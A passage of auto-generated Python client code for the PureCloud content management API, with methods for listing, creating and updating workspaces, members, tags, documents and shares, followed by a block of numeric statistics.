if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_members`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceMemberEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_tagvalue(self, workspace_id, tag_id, **kwargs):
"""
Get a workspace tag
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_tagvalue(workspace_id, tag_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str tag_id: Tag ID (required)
:param list[str] expand: Which fields, if any, to expand.
:return: TagValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'tag_id', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_tagvalue" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_tagvalue`")
# verify the required parameter 'tag_id' is set
if ('tag_id' not in params) or (params['tag_id'] is None):
raise ValueError("Missing the required parameter `tag_id` when calling `get_contentmanagement_workspace_tagvalue`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/{tagId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'tag_id' in params:
path_params['tagId'] = params['tag_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValue',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspace_tagvalues(self, workspace_id, **kwargs):
"""
Get a list of workspace tags
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspace_tagvalues(workspace_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str value: filter the list of tags returned
:param int page_size: Page size
:param int page_number: Page number
:param list[str] expand: Which fields, if any, to expand.
:return: TagValueEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'value', 'page_size', 'page_number', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspace_tagvalues" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_contentmanagement_workspace_tagvalues`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'value' in params:
query_params['value'] = params['value']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValueEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_contentmanagement_workspaces(self, **kwargs):
"""
Get a list of workspaces.
Specifying 'content' access will return all workspaces the user has document access to, while 'admin' access will return all group workspaces the user has administrative rights to.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_contentmanagement_workspaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] access: Requested access level.
:param list[str] expand: Which fields, if any, to expand.
:return: WorkspaceEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number', 'access', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contentmanagement_workspaces" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/contentmanagement/workspaces'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'access' in params:
query_params['access'] = params['access']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_auditquery(self, body, **kwargs):
"""
Query audits
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_auditquery(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ContentQueryRequest body: Allows for a filtered query returning facet information (required)
:return: QueryResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_auditquery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_auditquery`")
resource_path = '/api/v2/contentmanagement/auditquery'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryResults',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_document(self, document_id, body, **kwargs):
"""
Update a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_document(document_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param DocumentUpdate body: Document (required)
:param str expand: Expand some document fields
:param bool override: Override any lock on the document
:return: Document
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'body', 'expand', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_document" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `post_contentmanagement_document`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_document`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Document',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_document_content(self, document_id, body, **kwargs):
"""
Replace the contents of a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_document_content(document_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str document_id: Document ID (required)
:param ReplaceRequest body: Replace Request (required)
:param bool override: Override any lock on the document
:return: ReplaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['document_id', 'body', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_document_content" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'document_id' is set
if ('document_id' not in params) or (params['document_id'] is None):
raise ValueError("Missing the required parameter `document_id` when calling `post_contentmanagement_document_content`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_document_content`")
resource_path = '/api/v2/contentmanagement/documents/{documentId}/content'.replace('{format}', 'json')
path_params = {}
if 'document_id' in params:
path_params['documentId'] = params['document_id']
query_params = {}
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReplaceResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_documents(self, body, **kwargs):
"""
Add a document.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_documents(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param DocumentUpload body: Document (required)
:param str copy_source: Copy a document within a workspace or to a new workspace. Provide a document ID as the copy source.
:param str move_source: Move a document to a new workspace. Provide a document ID as the move source.
:param bool override: Override any lock on the source document
:return: Document
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'copy_source', 'move_source', 'override']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_documents" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_documents`")
resource_path = '/api/v2/contentmanagement/documents'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'copy_source' in params:
query_params['copySource'] = params['copy_source']
if 'move_source' in params:
query_params['moveSource'] = params['move_source']
if 'override' in params:
query_params['override'] = params['override']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Document',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_query(self, body, **kwargs):
"""
Query content
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_query(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param QueryRequest body: Allows for a filtered query returning facet information (required)
:param str expand: Expand some document fields
:return: QueryResults
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_query`")
resource_path = '/api/v2/contentmanagement/query'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QueryResults',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_shares(self, body, **kwargs):
"""
Creates a new share or updates an existing share if the entity has already been shared
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_shares(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param CreateShareRequest body: CreateShareRequest - entity id and type and a single member or list of members are required (required)
:return: CreateShareResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_shares" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_shares`")
resource_path = '/api/v2/contentmanagement/shares'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateShareResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_workspace_tagvalues(self, workspace_id, body, **kwargs):
"""
Create a workspace tag
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_workspace_tagvalues(workspace_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param TagValue body: tag (required)
:return: TagValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_workspace_tagvalues" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `post_contentmanagement_workspace_tagvalues`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_workspace_tagvalues`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValue',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_workspace_tagvalues_query(self, workspace_id, body, **kwargs):
"""
Perform a prefix query on tags in the workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_workspace_tagvalues_query(workspace_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param TagQueryRequest body: query (required)
:param list[str] expand: Which fields, if any, to expand.
:return: TagValueEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'body', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_workspace_tagvalues_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `post_contentmanagement_workspace_tagvalues_query`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_workspace_tagvalues_query`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/query'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValueEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_contentmanagement_workspaces(self, body, **kwargs):
"""
Create a group workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_contentmanagement_workspaces(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param WorkspaceCreate body: Workspace (required)
:return: Workspace
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_contentmanagement_workspaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_contentmanagement_workspaces`")
resource_path = '/api/v2/contentmanagement/workspaces'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workspace',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_contentmanagement_workspace(self, workspace_id, body, **kwargs):
"""
Update a workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_contentmanagement_workspace(workspace_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param Workspace body: Workspace (required)
:return: Workspace
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_contentmanagement_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `put_contentmanagement_workspace`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `put_contentmanagement_workspace`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workspace',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_contentmanagement_workspace_member(self, workspace_id, member_id, body, **kwargs):
"""
Add a member to a workspace
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_contentmanagement_workspace_member(workspace_id, member_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str member_id: Member ID (required)
:param WorkspaceMember body: Workspace Member (required)
:return: WorkspaceMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'member_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_contentmanagement_workspace_member" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `put_contentmanagement_workspace_member`")
# verify the required parameter 'member_id' is set
if ('member_id' not in params) or (params['member_id'] is None):
raise ValueError("Missing the required parameter `member_id` when calling `put_contentmanagement_workspace_member`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `put_contentmanagement_workspace_member`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/members/{memberId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'member_id' in params:
path_params['memberId'] = params['member_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkspaceMember',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_contentmanagement_workspace_tagvalue(self, workspace_id, tag_id, body, **kwargs):
"""
Update a workspace tag. Will update all documents with the new tag value.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_contentmanagement_workspace_tagvalue(workspace_id, tag_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str workspace_id: Workspace ID (required)
:param str tag_id: Tag ID (required)
:param TagValue body: Workspace (required)
:return: TagValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'tag_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_contentmanagement_workspace_tagvalue" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `put_contentmanagement_workspace_tagvalue`")
# verify the required parameter 'tag_id' is set
if ('tag_id' not in params) or (params['tag_id'] is None):
raise ValueError("Missing the required parameter `tag_id` when calling `put_contentmanagement_workspace_tagvalue`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `put_contentmanagement_workspace_tagvalue`")
resource_path = '/api/v2/contentmanagement/workspaces/{workspaceId}/tagvalues/{tagId}'.replace('{format}', 'json')
path_params = {}
if 'workspace_id' in params:
path_params['workspaceId'] = params['workspace_id']
if 'tag_id' in params:
path_params['tagId'] = params['tag_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagValue',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 40.409568
| 260
| 0.556845
| 12,696
| 130,927
| 5.544266
| 0.028986
| 0.038869
| 0.021608
| 0.020514
| 0.931382
| 0.921466
| 0.9103
| 0.907316
| 0.899929
| 0.896093
| 0
| 0.000621
| 0.360193
| 130,927
| 3,239
| 261
| 40.422044
| 0.839676
| 0.25638
| 0
| 0.849942
| 0
| 0
| 0.207445
| 0.058135
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022596
| false
| 0
| 0.004056
| 0
| 0.049247
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
